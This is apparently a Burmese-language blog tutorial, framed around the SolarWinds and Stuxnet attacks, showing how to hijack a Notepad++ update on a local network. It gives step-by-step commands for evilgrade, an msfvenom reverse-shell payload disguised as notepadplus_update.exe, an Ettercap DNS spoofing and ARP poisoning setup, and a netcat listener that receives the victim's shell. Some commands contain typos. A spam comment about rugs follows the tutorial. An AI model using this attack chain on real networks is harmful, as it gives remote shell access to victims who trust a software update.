Software Upgrades Hijacking like SolarWings Attack
SolarWings Attack အကြောင်း သိပြီးပြီဆိုတော့ MitM ကို လက်တွေ့ စမ်းကြည့်ချင်ကြမှာပါ။ SolarWings သာမက Stuxnet Worm သည်လည်းပဲ Realtek and Jmicro ရဲ့ Driver Signature တွေကို သုံးပြီးတော့ Update ကို Kernel ထဲအထိ install လုပ်ခဲ့တာ ဖြစ်ပါတယ်။ Legiimate signature တွေ ဖြစ်တာမို့လို့ System က ဘာမှ မမေးတော့ဘဲ Upgrade လုပ်လို့ရသွားတာပါ။ ဒါက ဘာကိုပြသလဲဆိုရင် အကောင်းဆုံးဆိုတဲ့ အခြေအနေနဲ့ digital signature တွေရဲ့ အားနည်းချက်ကို မြင်သာစေခဲ့တဲ့ ဖြစ်ရပ်တွေ ဆိုတာကိုပါ။ လက်တွေ့လေး စမ်းကြည့်ကြစို့။
Step #1: evilgrade
isr-evilgrade က အစောပိုင်း Kali ဗားရှင်းတွေမှာ built-in ပါဝင်ခဲ့ပြီးတော့ နောက်ပိုင်းမှာတော့ ပါမလာပြန်ပါဘူး။ ပါသည်ဖြစ်စေ မပါသည်ဖြစ်စေ apt install ကို သုံးပြီးတော့ install လို့ရပါတယ်။
kali # evilgrade
ပုံမှာ မြင်ရတဲ့အတိုင်း evilgrade က သူ့မှာပါတဲ့ module တွေကို loading လုပ်တာကို မြင်ရမှာပါ။ module တစ်ခုစီက evilgrade အနေနဲ့ hijact လုပ်နိုင်တဲ့ software App တွေကို ကိုယ်စားပြုပါတယ်။
kali # show modules
ဒီနေရာမှာ နမူနာအနေနဲ့ Notepad++ ကို hijack လုပ်ပြပါမယ်။ configure လုပ်ဖို့အတွက် အောက်ပါအတိုင်း ရိုက်ပါ
evilgrade > configure notepadplus
module ကို ဖတ်ပြီးတဲ့အခါ အထဲမှာ ဘာ option တွေပါလဲဆိုတာ ဒီလို ကြည့်နိုင်ပါတယ်။
Step #2: Generate Payload in Metasploit
ပြီးရင်တော့ နောက်ထပ် Terminal တစ်ခုကနေ msfvenom ကို သုံးပြီးတော့ Payload တစ်ခု ထုတ်ထားပါမယ်။ အကယ်၍ Metasploit နဲ့ ပတ်သက်ပြီးတော့ အစိမ်းသက်သက် ဖြစ်နေတယ်ဆိုရင်တော့ ဒီနေရာကိုနှိပ်ပြီး စာလေးနည်းနည်း ဖတ်ကြည့်ပါ ။
ခု notepadplus_update.exe ဆိုတဲ့ ဖိုင်တစ်ခု ဖန်တီးပါမယ်။ သူ့ကို /root/evilgrade ဆိုတဲ့ directory တစ်ခုမှာ ဖန်တီးပြီး သီးသန့်ထားထားပါမယ်။
kali # sudo mkdir /root/evilgrade
directory တစ်ခု ဖန်တီးပြီးတဲ့အခါ payload တစ်ခု create လုပ်မှာ ဖြစ်ပါတယ်။
kali # msfvenom windows/shell_reverse_tcp LHOST 192.168.1.118 LPORT=6996 X > /root/evigrade/notepadplus_update.exe
IP နေရာမှာတော့ မိမိတို့ IP ဖြည့်ရမှာပါ။ ခုဆိုရင်တော့ Notepadplus_update ဆိုတဲ့ exe ဖိုင်တစ်ခု ရပြီ ဖြစ်ပါတယ်။ msfvenom အကြောင်းကို အလျဥ်းသင့်တဲ့အခါ ရေးပြပါဦးမယ်။
Payload ဖန်တီးပြီးပြီ ဆိုတော့ evilgrade ကို ဖန်တီးထားတဲ့ exe နဲ့ သိအောင် set လုပ်ပေးရမှာ ဖြစ်ပါတယ်။ တစ်ခု သတိပြုရမှာက Linux system သည် တိကျပါတယ်။ Case Sensitive ဖြစ်တာမို့ ဖိုင်လမ်းကြောင်း နဲ့ ဖိုင်နာမည် အကြီးအသေးကအစ လွဲလို့လုံးဝ မရပါ ဘူး။
evilgrade (notepadplus) > set agent /root/evilgrade/notepadplus_update.exe
>
ပြီးပြီဆိုရင်တော့ server ကို start လုပ်နိုင်ပါပြီ။
evilgrade (notepadplus) > start
Step #3: Download and Install Notepad+
ဒါကတော့ ကိုယ့်ရဲ့ Lab machine ထဲမှာ Notepad++ ကို install ဖို့ပါ။ Real World မှာတော့ ကိုယ့်ရဲ့ Target သည် Notepad++ ကို သုံးနေတဲ့သူလို့ ယူဆရအောင်။ မရှိသေးရင် ဒီမှာ ဒေါင်းပါ.
ခုဆိုရင်တော့ Lab Machine မှာလည်း Notepad++ ရှိနေပြီဖြစ်ပါတယ်။
Step #4: Setting Up our MiTM
MiTM attackကို စတင်ပါမယ်။ Ettercap ကို ပူးတွဲသုံးပါမယ်။ Ettercap အကြောင်း နောက်ပိုင်းမှာ ရေးဖြစ်မယ်ထင်ပါတယ်။ ခုတော့ အခြေအနေအရ မရေးနိုင်သေးပါဘူး။ 😊😊
Ettercap ကို သုံးပြီးတော့ DNS queries ကို redirect လုပ်ပါမယ်။ ပထမဆုံး ettercap ကို ဖွင့် dns file ကို edit လုပ်ရပါမယ်။ မိမိအဆင်ပြေရာ Text editor ကို သုံးနိုင်ပါတယ်။ အောက်ပါ နမူနာထဲက တစ်ခုခုကို သုံးနိုင်ပါတယ်။
kali # sudo leafpad /etc/ettercap/etter.dns
kali # sudo mousepad /etc/ettercap/etter.dns
kali # sudo nano /etc/ettercap/etter.dns
ဖိုင်ထဲကို နောက်ထပ် စာတစ်ကြောင်း ထပ်ထည့်ပါမယ်။ ထည့်တဲ့ကောင်က VirtualHost address အဖြစ် သုံးမှာဖြစ်ပါတယ်။ အောက်ပါအတိုင်း ဖြည့်ပါ။
notepad-plus.sourceforge.net A 192.168.1.106
ပြီးရင်တော့ Ettercap ကို Graphical Mode (GUI) နဲ့ စတင်နိုင်ပါပြီ။
kali # ettercapv -G
ပြီးရင် Sniff လုပ်နိုင်ပါပြီ။
နောက်တစ်ဆင့်က Ettercap ရဲ့ dns_spoof plugin ကို activate လုပ်ပေးဖို့ဖြစ်ပါတယ်။ Plugins -->Manage Plugins -->dns_spoof
ပြီးတော့Hosts --> scan for hosts.
host scanning ပြီးသွားရင် ဒါဆက်လုပ် -- Hosts --> Hosts listအောက်ပါပုံစံမျိုး ဖြစ်လာမယ်။ IP အနည်း အများကတော့ သင့် network အနေအထားပေါ် မူတည်ပါတယ်။
IP တွေထဲကမှာ Router ကို Target 1 ထားမယ်။ Victim ကို Target 2 ထားပါမယ်။ ပြီးရင်
ARP poisoning ကို စတင်လုပ်ဆောင်နိုင်ပါပြီ။ Mitm --> Arp poisoning
Sniff Remote connections ကို အမှန်ခြစ် ဖြည့်ပါမယ်
Step #5: Set Up a Netcat Listener
Victim က update လုပ်တဲ့အခါမှာ ပြန်ရလာမယ့် shell access အတွက် netcat (nc) နဲ့ listen လုပ်ထားဖို့ လိုပါမယ်။ Terminal အသစ်တစ်ခုကနေ လုပ်ထားနိုင်ပါတယ်။ ခု ဆိုရင်တော့ Router နဲ့ Victim ရဲ့ ကြားမှာ ကြားလူ အဖြစ် ရောက်နေပါပြီ။ ဒီတော့ သူတို့တွေရဲ့ ဆက်သွယ်မှုမှန်သမျှက ကျွန်တော်တို့ရဲ့ system ကို ဖြတ်သွားရမှာ ဖြစ်ပါတယ်။ Payload create လုပ်ခဲ့စဥ်က သုံးတဲ့ခဲ့ port 6996 ကို သုံးပြီးတော့ listen လုပ်မှာပါ။
kali # nc -l -p 6996
kali # nc -lvp 6996
victim က Notepad++ ကို ဖွင့်လိုက်တဲ့အခါ Update လုပ်ဖို့ပြောနေတာကို မြင်ရမှာ ဖြစ်ပါတယ်။
"Yes" ကို နှိပ်လိုက်မယ်ဆိုရင်တော့ ကျွန်တော်တို့ရဲ့ malicious server ကနေ Payload ကို ယူသွားမှာ ဖြစ်ပါတယ်။ တကယ် update မလုပ်ဘဲနဲ့ victim's system ရဲ့ shell access ကို ရမှာ ပါ။
MiTM တွေထဲက တစ်ခုပါ။ နောက်ထပ်လည်း အလျဥ်းသင့်တဲ့အခါ ထပ်ရေးသွားပါဦးမယ်။
အားလုံးကို ကျေးဇူးပါ
While looking for a Washable Rugs face to face permits you to get a superior feeling of its actual shading and surface, there are such countless more choices on the web — and you get the additional advantage of having it conveyed right to your doorstep.
ReplyDelete